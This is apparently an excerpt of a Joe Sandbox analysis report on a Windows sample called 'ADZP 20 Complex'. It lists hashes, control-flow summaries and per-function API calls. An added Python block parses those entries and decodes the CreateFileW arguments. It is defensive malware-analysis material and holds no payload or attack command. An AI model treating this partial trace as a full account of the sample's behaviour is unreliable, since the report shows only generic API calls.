                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: FileNameTemp$Value$AllocateErrorHeapLastPath$BackslashExtensionRenamewcslen
                    • String ID: $pA$$pA$$pA$$pA
                    • API String ID: 368575804-1531182785
                    • Opcode ID: 43ebda8593a92aa5bcc9b73b08c12452a331b9e9f1a1c6ad17b213a13871d9c3
                    • Instruction ID: 7226354e244135f3a7293121bd0c5faf706f4cf1cd60fca57ba481f11b9cb304
                    • Opcode Fuzzy Hash: 43ebda8593a92aa5bcc9b73b08c12452a331b9e9f1a1c6ad17b213a13871d9c3
                    • Instruction Fuzzy Hash: 3D510F71104304BED600BBB2DC42E7F7A6DEB84308F018C3FB540A50E2EA3D99655A6E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • memset.MSVCRT ref: 0040100F
                    • GetModuleHandleW.KERNEL32(00000000), ref: 0040101C
                    • HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035
                      • Part of subcall function 0040E4D0: HeapCreate.KERNELBASE(00000000,00001000,00000000,?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4DC
                      • Part of subcall function 0040E4D0: TlsAlloc.KERNEL32(?,00401053,00000000,00001000,00000000,00000000), ref: 0040E4E7
                      • Part of subcall function 0040A1C0: HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 0040A1C9
                      • Part of subcall function 00409669: InitializeCriticalSection.KERNEL32(00418730,00000004,00000004,0040963C,00000010,00000000,00000000,00401071,00000000,00001000,00000000,00000000), ref: 00409691
                      • Part of subcall function 00408DEE: memset.MSVCRT ref: 00408DFB
                      • Part of subcall function 00408DEE: InitCommonControlsEx.COMCTL32(00000008,00001000), ref: 00408E15
                      • Part of subcall function 00408DEE: CoInitialize.OLE32(00000000), ref: 00408E1D
                      • Part of subcall function 004053B5: InitializeCriticalSection.KERNEL32(00418708,0040107B,00000000,00001000,00000000,00000000), ref: 004053BA
                    • GetStdHandle.KERNEL32(FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040109A
                      • Part of subcall function 0040A460: HeapAlloc.KERNEL32(00000000,0000003C,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A47F
                      • Part of subcall function 0040A460: HeapAlloc.KERNEL32(00000008,00000015,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040A4A5
                      • Part of subcall function 0040A460: HeapAlloc.KERNEL32(00000008,FFFFFFED,FFFFFFED,00000010,00010000,00000004,00000200,?,?,?,?,004010C3,00000004,00000015,00000000,00000200), ref: 0040A502
                      • Part of subcall function 0040AA5A: HeapFree.KERNEL32(00000000,?,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000), ref: 0040AA98
                      • Part of subcall function 0040AA5A: HeapFree.KERNEL32(00000000,?,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040AAB1
                      • Part of subcall function 0040AA5A: HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,?,004010CE,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000), ref: 0040AABB
                      • Part of subcall function 0040A9C8: HeapAlloc.KERNEL32(00000000,00000034,?,?,?,004010E9,00000008,00000000,0041706C,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A9DB
                      • Part of subcall function 0040A9C8: HeapAlloc.KERNEL32(FFFFFFF5,00000008,?,?,?,004010E9,00000008,00000000,0041706C,00000007,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 0040A9F0
                      • Part of subcall function 0040E266: RtlAllocateHeap.NTDLL(00000000,FFFFFFDD,?,00000200,?,?,?,0040112D,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000,00417064), ref: 0040E296
                      • Part of subcall function 0040E266: memset.MSVCRT ref: 0040E2D1
                    • SetConsoleCtrlHandler.KERNEL32(00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000,00417064,00000008,00000008), ref: 0040116F
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02200000,00000000,?), ref: 0040E599
                      • Part of subcall function 00401BA0: LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0,00000000), ref: 00401BDE
                      • Part of subcall function 00401BA0: EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BFB
                      • Part of subcall function 00401BA0: FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0), ref: 00401C03
                    • HeapDestroy.KERNEL32(00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004), ref: 004011C6
                    • ExitProcess.KERNEL32(00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004), ref: 004011CB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Heap$Alloc$Free$CreateInitializememset$AllocateCriticalErrorHandleLastLibrarySectionValue$CommonConsoleControlsCtrlDestroyEnumExitHandlerInitLoadModuleProcessResourceTypes
                    • String ID: .pA$:pA$|pA
                    • API String ID: 1832782000-3272395972
                    • Opcode ID: 11f145e1b951a2c6a28e78b56360a089cdbe7b1a81af6c9d6466caa6387cbb0c
                    • Instruction ID: c3718d3f77f1aa7f822ccfb4f0aafd009571b65037601bc21910cdbb085b96b1
                    • Opcode Fuzzy Hash: 11f145e1b951a2c6a28e78b56360a089cdbe7b1a81af6c9d6466caa6387cbb0c
                    • Instruction Fuzzy Hash: 77313271680704A9E200B7B39C47F9E3A18AB1874CF11883FB744790E3DEBC55584A6F
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Function 0040B140, 44 basic blocks (node ids 243-286 in the original graph image; the executed / not-executed colouring is not preserved here). API call sites: CreateFileW in four blocks (40b19c, 40b1dd, 40b227, 40b249), HeapAlloc (40b28e), SetFilePointer (40b2dc); internal calls to 0040DB18 and 0040DA8A.
                    APIs
                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040B1B1
                    • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040B1F2
                    • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040B23C
                    • CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000,?,?,?,00000000,00000000), ref: 0040B25E
                    • HeapAlloc.KERNEL32(00000000,00001000,?,?,?,?,00000000,00000000), ref: 0040B297
                    • SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040B2EA
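The four CreateFileW call sites above differ only in the access mask and creation disposition (80000000/3, C0000000/4, C0000000/2, 40000000/5), which is what a generic open-for-read / open-or-create / create-always / truncate file helper looks like once the arguments are decoded. The Python below is an added example, not part of the Joe Sandbox report or of the sample's code: it parses API bullets in this report's format and decodes the CreateFileW arguments into their Win32 constant names. Argument positions follow the CreateFileW prototype (dwDesiredAccess is the 2nd argument, dwShareMode the 3rd, dwCreationDisposition the 5th); a `?` is a value the analyzer could not resolve and is left undecoded rather than guessed. The sample record is copied from the bullets of the 0040B140 function above, plus one subcall bullet (wcslen, from the 0040E6C0 helper listed elsewhere on this page) to exercise the no-argument form.

```python
"""Parse the per-function "APIs" bullets of a Joe Sandbox report and decode CreateFileW arguments."""
import re
from typing import Optional

# Win32 constants (winnt.h / fileapi.h) used to decode CreateFileW arguments.
GENERIC_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
                  0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
SHARE_MODE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}

# One bullet: optional "Part of subcall function X:" prefix, Api.Module, optional (args), "ref: addr".
API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$")


def parse_args(text: Optional[str]) -> list:
    """'?,80000000,-00000004' -> [None, 0x80000000, -4]; '?' is a value the analyzer could not resolve."""
    if not text:
        return []
    return [None if tok.strip() == "?" else int(tok.strip(), 16) for tok in text.split(",")]


def parse_api_line(line: str) -> Optional[dict]:
    """Return the parsed bullet, or None for lines that are not API bullets (hashes, headings, ...)."""
    m = API_LINE.match(line)
    if not m:
        return None
    return {"name": m["name"], "module": m["module"], "args": parse_args(m["args"]),
            "ref": m["ref"], "subcall_of": m["sub"]}


def _bits(value: int, table: dict) -> list:
    """Names of the flag bits set in value; a zero mask is reported as ['0']."""
    return [name for bit, name in table.items() if value & bit] or ["0"]


def decode_createfilew(args: list) -> dict:
    """Decode dwDesiredAccess (arg 2), dwShareMode (arg 3) and dwCreationDisposition (arg 5).
    Unresolved ('?') arguments stay None instead of being guessed."""
    def pick(i: int):
        return args[i] if i < len(args) else None
    access, share, disp = pick(1), pick(2), pick(4)
    return {"access": None if access is None else _bits(access, GENERIC_ACCESS),
            "share": None if share is None else _bits(share, SHARE_MODE),
            "disposition": None if disp is None else DISPOSITION.get(disp, f"unknown({disp})")}


def parse_record(text: str) -> dict:
    """Parse one function record: API bullets, direct (non-subcall) calls, Opcode ID, instruction fuzzy hash."""
    apis = [a for a in (parse_api_line(line) for line in text.splitlines()) if a]
    opcode = re.search(r"Opcode ID:\s*([0-9a-f]{64})", text)
    fuzzy = re.search(r"Instruction Fuzzy Hash:\s*([0-9A-F]+)", text)
    return {"apis": apis,
            "direct": [a for a in apis if a["subcall_of"] is None],
            "opcode_id": opcode.group(1) if opcode else None,
            "instruction_fuzzy_hash": fuzzy.group(1) if fuzzy else None}


def file_open_summary(record: dict) -> list:
    """One line per direct CreateFileW call site: 'ref: access share=... disposition'."""
    def fmt(v):
        return "?" if v is None else (v if isinstance(v, str) else "|".join(v))
    out = []
    for a in record["direct"]:
        if a["name"] == "CreateFileW":
            d = decode_createfilew(a["args"])
            out.append(f"{a['ref']}: {fmt(d['access'])} share={fmt(d['share'])} {fmt(d['disposition'])}")
    return out


# Constructed sample: the bullets and hashes of the 0040B140 record copied from the report above,
# plus one subcall bullet (wcslen, from the 0040E6C0 helper) to exercise the no-argument form.
SAMPLE_RECORD = """
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040B1B1
• CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040B1F2
• CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00000000,00000000), ref: 0040B23C
• CreateFileW.KERNEL32(?,40000000,?,00000000,00000005,00000000,00000000,?,?,?,00000000,00000000), ref: 0040B25E
• HeapAlloc.KERNEL32(00000000,00001000,?,?,?,?,00000000,00000000), ref: 0040B297
• SetFilePointer.KERNEL32(?,00000000,?,00000002), ref: 0040B2EA
  • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
• Opcode ID: 1dd6c58127759367adb822d4a0e0d9138a9c495b34507b1400e0ba0402d2ad51
• Instruction Fuzzy Hash: D251B171244301ABE3208E15DC49B6BBAE5EB44764F24493EFD81A63E0D779E8458B8D
"""

if __name__ == "__main__":
    rec = parse_record(SAMPLE_RECORD)
    print("opcode id:", rec["opcode_id"])
    for line in file_open_summary(rec):
        print(line)
```

Run stand-alone, the block prints the Opcode ID and the four decoded call sites (read/OPEN_EXISTING, read-write/OPEN_ALWAYS, read-write/CREATE_ALWAYS, write/TRUNCATE_EXISTING with an unresolved share mode). The Opcode ID is the field to key on when looking for the same function in reports of related samples; the Uniqueness Score (-1.00% throughout this page) and the API String ID are left alone because the report does not document how they are derived.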
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: File$Create$AllocHeapPointer
                    • String ID:
                    • API String ID: 4207849991-0
                    • Opcode ID: 1dd6c58127759367adb822d4a0e0d9138a9c495b34507b1400e0ba0402d2ad51
                    • Instruction ID: 8d8b4ccba24edc48a090e0818cc57ca2d498b7de68d829e88f81714118269cc7
                    • Opcode Fuzzy Hash: 1dd6c58127759367adb822d4a0e0d9138a9c495b34507b1400e0ba0402d2ad51
                    • Instruction Fuzzy Hash: D251B171244301ABE3208E15DC49B6BBAE5EB44764F24493EFD81A63E0D779E8458B8D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Function 0040DE99, 26 basic blocks (node ids 287-312 in the original graph image; executed / not-executed colouring not preserved). API call sites: EnterCriticalSection (40ded5), HeapAlloc (40df07), LeaveCriticalSection (40df65), RtlAllocateHeap (40df72), InitializeCriticalSection (40dfb0); internal call to 0040E0C3 and a recursive call to 0040DE99 (40df1d).
                    APIs
                    • EnterCriticalSection.KERNEL32(00418684,0041867C,0040E062,00000000,FFFFFFED,00000200,76EC5E70,0040A4F6,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040DEDA
                    • HeapAlloc.KERNEL32(00000000,00000018,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000), ref: 0040DF11
                    • LeaveCriticalSection.KERNEL32(00418684,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DF6A
                    • RtlAllocateHeap.NTDLL(00000000,00000038,00000000,FFFFFFED,00000200,76EC5E70,0040A4F6,FFFFFFED,00000010,00010000,00000004,00000200), ref: 0040DF7B
                    • InitializeCriticalSection.KERNEL32(00000020,?,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5,00000000,00001000,00000000,00000000), ref: 0040DFB7
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: CriticalSection$Heap$AllocAllocateEnterInitializeLeave
                    • String ID:
                    • API String ID: 1272335518-0
                    • Opcode ID: d472077d75a53df2d0dde7d61b18959a765d34bb65c31e97d0a70733ac938e24
                    • Instruction ID: e12e1174ac54fca87ec7e67201d5359a366fc17122bfc308660e030bf91fb77e
                    • Opcode Fuzzy Hash: d472077d75a53df2d0dde7d61b18959a765d34bb65c31e97d0a70733ac938e24
                    • Instruction Fuzzy Hash: 90318D71940B069BC3208F95D844A52FBF0FB44720B19C93EE446A77A0DB78E908CB99
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Function 00403F53 (large graph; executed / not-executed colouring not preserved). Direct API call sites: GetModuleHandleW and PathRemoveBackslashW in block 404404-4045ee, SetConsoleCtrlHandler in block 404626-40469b. The graph is a chain of near-identical blocks (403f88, 404009, 40408a, 40410b, 40418c, 40420d, 404292, 404317, 40439c), each calling 0040E520, 00405DC0, 0040E560 and 0040E6C0, followed by the 404404-4045ee block that calls 0040D780, 00405182, 00405EB0, 00402E49, 00402150, 004051A0, 0040196C, 0040469C, 00405100, 00403539, 00402068, 00402BA6, 0040E720, 004099A5, 00403801 and 00401E66, then 0040548C or 00402C55, 00403C83, 00401FBA and nine calls to 0040E5F0 before the function ends.
                    APIs
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02200000,00000000,?), ref: 0040E599
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                      • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(02200000,00000000,?,?), ref: 0040E5BC
                    • GetModuleHandleW.KERNEL32(00000000,?,?,?,00000000,00000000,?,02209F70,00000000,00000000), ref: 0040445B
                    • PathRemoveBackslashW.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 00404554
                      • Part of subcall function 00402BA6: GetShortPathNameW.KERNEL32(02209F70,02209F70,00002710), ref: 00402BE0
                      • Part of subcall function 0040E720: TlsGetValue.KERNEL32(0000000D,?,?,00401DDF,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E72A
                      • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                      • Part of subcall function 004099A5: SetEnvironmentVariableW.KERNEL32(02209F70,02209F70,00404594,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004099BE
                      • Part of subcall function 00401E66: PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,00000000,00000000,00000000,00000000,-00000004,004045DB,00000000,00000000,00000000,02209F70,02208968,00000000,00000000), ref: 00401E9B
                    • SetConsoleCtrlHandler.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,02209F70,02208968,00000000,00000000,00000000), ref: 00404636
                      • Part of subcall function 0040548C: CreateThread.KERNEL32(00000000,00001000,?,?,00000000,02209F70), ref: 004054A5
                      • Part of subcall function 0040548C: EnterCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054B7
                      • Part of subcall function 0040548C: WaitForSingleObject.KERNEL32(00000008,00000000,00000000,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000), ref: 004054CE
                      • Part of subcall function 0040548C: CloseHandle.KERNEL32(00000008,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 004054DA
                      • Part of subcall function 0040548C: LeaveCriticalSection.KERNEL32(00418708,?,?,?,?,00402DD8,00000000,00000000,?,0000000A,?,00000000,00000001,00000000,00000000,00000000), ref: 0040551D
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Value$Path$AllocateCriticalErrorHandleHeapLastSection$BackslashCloseConsoleCreateCtrlEnterEnvironmentHandlerLeaveModuleNameObjectQuoteRemoveShortSingleSpacesThreadVariableWaitwcslen
                    • String ID: pA
                    • API String ID: 2577741277-3402996844
                    • Opcode ID: 50ce0f469a7665fb6dfd1afe813213fc97d1f4cade5af18fd151faefa158c23f
                    • Instruction ID: 999f5745f1e250978be3a13d4136388ffeb6a971fca5c6bbec0ef146a0a58392
                    • Opcode Fuzzy Hash: 50ce0f469a7665fb6dfd1afe813213fc97d1f4cade5af18fd151faefa158c23f
                    • Instruction Fuzzy Hash: 4712FAB5504304BED600BBB29C8197F77BCEB89718F10CC3FB544A6192EA3CD9559B2A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02200000,00000000,?), ref: 0040E599
                    • PathQuoteSpacesW.SHLWAPI(00000000,00000000,022089E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00404626,00000000,00000000,00000000,?), ref: 00403CE6
                      • Part of subcall function 0040E560: RtlReAllocateHeap.NTDLL(02200000,00000000,?,?), ref: 0040E5BC
                    • PathQuoteSpacesW.SHLWAPI(?,00000000,00000000,0041702A,00000000,00000000,00000000,00000000,022089E8,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00403D1F
                      • Part of subcall function 0040AE75: GetCurrentDirectoryW.KERNEL32(00000104,00000000,00000104,00000000,?,?,0000000A,004037B6,00000000,00000000,00000000,?,00000000,00000000,00000000,00404746), ref: 0040AE8B
                      • Part of subcall function 0040E720: TlsGetValue.KERNEL32(0000000D,?,?,00401DDF,00000000,00000000,00000000,FFFFFFF5,00000200,0000000A,00000000,00000000,FFFFFFF5,00000015,00000001,00000000), ref: 0040E72A
                      • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                      • Part of subcall function 004098F7: WaitForSingleObject.KERNEL32(02209F70,00000000,?,?,?,00403DC7,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044), ref: 00409904
                      • Part of subcall function 004098F7: PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,02209F70,00000000,?,?,?,00403DC7,?,00000000,00000000,00000000,0041702A,?), ref: 00409921
                      • Part of subcall function 004056D8: timeBeginPeriod.WINMM(00000001,00403793,00000001,?,00000000,00417024,00000000,00000000,00000000,?,00000000,00000000,00000000,00404746,00000000,00000000), ref: 004056E3
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Value$AllocateErrorHeapLastPathQuoteSpaces$BeginCurrentDirectoryNamedObjectPeekPeriodPipeSingleWaittimewcslen
                    • String ID: *pA$*pA
                    • API String ID: 2955313036-2893952571
                    • Opcode ID: 6f360bf5818642a08700f897070461880bdab54b83c1be6a7afe69dac29c3c04
                    • Instruction ID: 17d0f5624b42dd18ceef5440812bdbba4c8a787aaabb2d2d00a5c22853b10036
                    • Opcode Fuzzy Hash: 6f360bf5818642a08700f897070461880bdab54b83c1be6a7afe69dac29c3c04
                    • Instruction Fuzzy Hash: 4E41D875104205AAC600BF73DC8293F7669EFD4708F50CD3EB184361E2EA3D9D25AB6A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                      • Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677
                      • Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
                      • Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
                      • Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B
                      • Part of subcall function 00409698: GetModuleFileNameW.KERNEL32(00000000,00000104,00000104,00000000,?,?,?,00401BD6,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000), ref: 004096B4
                      • Part of subcall function 00409698: wcscmp.MSVCRT ref: 004096C2
                      • Part of subcall function 00409698: memmove.MSVCRT ref: 004096DA
                      • Part of subcall function 00405182: TlsGetValue.KERNEL32(00000000,00402F8A,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000,00000000), ref: 00405189
                    • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0,00000000), ref: 00401BDE
                    • EnumResourceTypesW.KERNEL32(00000000,00000000,00000000), ref: 00401BFB
                    • FreeLibrary.KERNEL32(?,00000000,00000000,00000000,00000002,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,0040119C,004180A0), ref: 00401C03
                      • Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7
                      • Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
                      • Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02200000,00000000,?), ref: 0040E599
                    Memory Dump Source
                    • Source File: 00000000.00000002.3241664003.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.3238898610.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3246045104.0000000000413000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3252525845.0000000000417000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.3256164934.0000000000419000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_ADZP 20 Complex.jbxd
                    Similarity
                    • API ID: Value$ErrorLastLibrary$AllocateEnumFileFreeHeapLoadModuleNameResourceTypesmemmovewcscmpwcslen
                    • String ID:
                    • API String ID: 983379767-0
